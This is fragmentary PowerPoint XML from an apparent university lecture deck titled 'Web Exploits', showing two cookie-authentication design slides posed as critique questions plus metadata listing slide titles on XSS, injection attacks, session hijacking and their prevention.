            <a:ext cx="6636327" cy="53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Design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Requirement: authenticate users on site </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Design:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>use digest authentication to login user </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>set cookie containing hashed username </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>check cookie for hashed username </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>Q: Is there anything wrong with this design?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2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Design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Requirement: authenticate users on site </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Design:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>use digest authentication to login user </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>set cookie containing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>encrypted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> username </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>check cookie for hashed username </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>Q: Is there anything wrong with this design?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5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HTTP + Crypto Sauce ≠ Web Security </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="5400" dirty="0">
                <a:effectLst/>
              </a:rPr>
            </a:b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https://www.owasp.org/index.php/Testing_for_cookies_attributes_(OTG-SESS-002)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5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1270</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>173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</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Web Exploits</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>Early Web Systems</vt:lpstr>
      <vt:lpstr>Adding state with cookies</vt:lpstr>
      <vt:lpstr>Cookies behaving badly</vt:lpstr>
      <vt:lpstr>Cookies behaving badly</vt:lpstr>
      <vt:lpstr>Cookie Design 1</vt:lpstr>
      <vt:lpstr>Cookie Design 2</vt:lpstr>
      <vt:lpstr>HTTP + Crypto Sauce ≠ Web Security  </vt:lpstr>
      <vt:lpstr>Javascript</vt:lpstr>
      <vt:lpstr>Dynamic Content: CGI</vt:lpstr>
      <vt:lpstr>CGI</vt:lpstr>
      <vt:lpstr>Embedded scripting</vt:lpstr>
      <vt:lpstr>Embedded scripting</vt:lpstr>
      <vt:lpstr>Web systems evolve…</vt:lpstr>
      <vt:lpstr>The new web-page </vt:lpstr>
      <vt:lpstr>Attacks on web systems </vt:lpstr>
      <vt:lpstr>Cross-Site Scripting</vt:lpstr>
      <vt:lpstr>The Internet is littered with XSS vulnerabilities </vt:lpstr>
      <vt:lpstr>Stealing Cookies with XSS</vt:lpstr>
      <vt:lpstr>Two main XSS types</vt:lpstr>
      <vt:lpstr>Injection attacks: Shell injection</vt:lpstr>
      <vt:lpstr>Injection attacks: filename injection</vt:lpstr>
      <vt:lpstr>Injection attacks: SQL injection</vt:lpstr>
      <vt:lpstr>Little Bobby Tables</vt:lpstr>
      <vt:lpstr>Preventing SQL Injection</vt:lpstr>
      <vt:lpstr>Session hijacking</vt:lpstr>
      <vt:lpstr>System vulnerabilities</vt:lpstr>
      <vt:lpstr>Preventing Web Attacks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Exploits</dc:title>
  <dc:creator>Xenia Mountrouidou</dc:creator>
  <cp:lastModifiedBy>Dr. X</cp:lastModifiedBy>
  <cp:revision>31</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-03-14T17:40:18Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-03-22T21:43:36Z</dcterms:modified>
</cp:coreProperties>
</file>